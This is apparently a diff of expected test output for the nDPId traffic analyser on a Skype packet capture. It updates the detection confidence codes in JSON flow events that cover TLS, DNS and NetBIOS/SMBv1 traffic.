-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAJg3uZAAEAGIhfAqAEiEaxkJMgbAbtPoUdOdzmC\/1AY\/\/82dAAAFwMDAjP0A3EPvtkTeRb8cFQp6pny5RM9Gnq4g+tevwtE\/WP22C8Uri1KdT3EBD+yCpMq\/b87CkoZm1+57ReFpRxcXXNbv8fmUZp4LfXGYAKK\/pxeeUvalXmICe2lECt2CjjUSRyUKdAGFZrNvCY2\/wZUpBfyYa\/+rlJcFwW3DXHOhnHdn4QEUo73+QW6pHlQGunmF0QmCQanElT8N\/bMb3RJnCc61l4RycIlVAF6Ksg5HA\/PKrYlV2XNEp7ur7RV1bzdvrRDp05wQjE83yF2+\/Zqwt4MRXssBShrwnb3hEuuMcZgQoFkEhY58EVGP3Ljm+RQgt\/RdUWzV6sjs4TAaqiNuIwUaqv+AfsmnLhujtd9Hc6+ZcJ9yMianW3O6MVxJ70OU7QnQRAi9B2JbRVg59CxbKPbN0bnPbMKE5N39MjxBkYm0yiOiyiHl0P3Xm8ltEin3BwY+GDkHhnXcwEeooC2S1\/4ktGCaZHkn\/k2Szc8GZnaGTWNnahHoy\/YkjOOXbjpA1O9h79pJ7aYrlRvBOm3f1m9CJ9BUs\/FU4sHmdZR0BiRQukoVRFc42QMlL7+4m6\/BxZQimsAq\/phHH03+2+AKsxWWcE29ndM6W1tas2nE7vfTX1S5m\/YyEFVMUyOo5pk7CkRxQvvBfhIGFzzhSjuVThl8iSAOkaF9xkVKPHRO\/JJKo90DAl86kKSFj0IAulnEwTwaRdIuubGGi2tTWanj85dryrFg8Q4mVv2pDFEoHGcuAXqGw=="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431970637339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431970637339,"pkt":"PBXCt3IO0NQSxnP1CABFAAAo8lZAAO8GYd4RrGQkwKgBIgG7yBt3OYL\/T6FHTlAQnYx\/rgAAAAAAAAAA"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1431970637372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970637372,"pkt":"0NQSxnP1PBXCt3IOCABFAABLkYQAAEARZarAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
@@ -110,122 +110,122 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1431970637443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970637443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6+FgAAEAR\/ubAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABLoPEAAEARVj3AqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/NIAAEAR+lvAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
-00657{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00657{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431970642408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkRoAAEARZRPAqAEiwKgB\/wCJAIkAOosFRXIBEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1431970642408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOP7YAAEARtnfAqAEiwKgB\/wCJAIkAOrIIRXEBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1431970642409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642409,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkDsAAEARZfLAqAEiwKgB\/wCJAIkAOrIDRXYBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1431970642412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1431970642412,"pkt":"PBXCt3IO0NQSxnP1CABFAABaAABAAEARtx\/AqAEBwKgBIgCJAIkARtFGRXKFgAAAAAEAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAEAA\/SAAAaAAMCoAQE="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1431970642413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1431970642413,"pkt":"PBXCt3IO0NQSxnP1CABFAABaAABAAEARtx\/AqAEBwKgBIgCJAIkARnhKRXGFgAAAAAEAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAEAA\/SAAAYAAMCoAQE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1431970642414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1431970642414,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAADKa30AAEARijTAqAEiwKgB\/wCKAIoAtudmEQJFcMCoASIAAACgAAAgRU1GRkVERUJGREVORUJFREVDRVBFUEVMRkFGQ0VQQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAcAIAAG9FEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQRuRQAA"} 
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1431970642417,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1431970642417,"pkt":"PBXCt3IO0NQSxnP1CABFAADUAABAAEARtqXAqAEBwKgBIgCKAIoAwKmzEAoqm8CoAQEAigCqAAAgRUJFTUVKRURFRkVIRUJGRUVGQ0FDQUNBQ0FDQUNBQUEAIEVNRkZFREVCRkRFTkVCRURFQ0VQRVBFTEZBRkNFUEFBAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAFYAAwABAAEAAgAhAFxNQUlMU0xPVFxCUk9XU0UACgFuRQAAQUxJQ0VHQVRFAA=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1431970642418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642418,"pkt":"0NQSxnP1PBXCt3IOCABFAABOXUsAAEARmeDAqAEiwKgBAQCJAIkAOtIRRXgAAAABAAAAAAAAIEVCRU1FSkVERUZFSEVCRkVFRkNBQ0FDQUNBQ0FDQUNBAAAhAAE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1431970643669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970643669,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABOBnEAAEAR74LAqAFcwKgB\/wCJAIkAOrExRg4BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1431970643670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1431970643670,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAADKWJAAAEARnOfAqAFcwKgB\/wCKAIoAtjdgEQJGDcCoAVwAAACgAAAgRU1GRkVERUJGRENORUpFTkVCRURDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAACwUAAAxGEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQQLRgAA"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 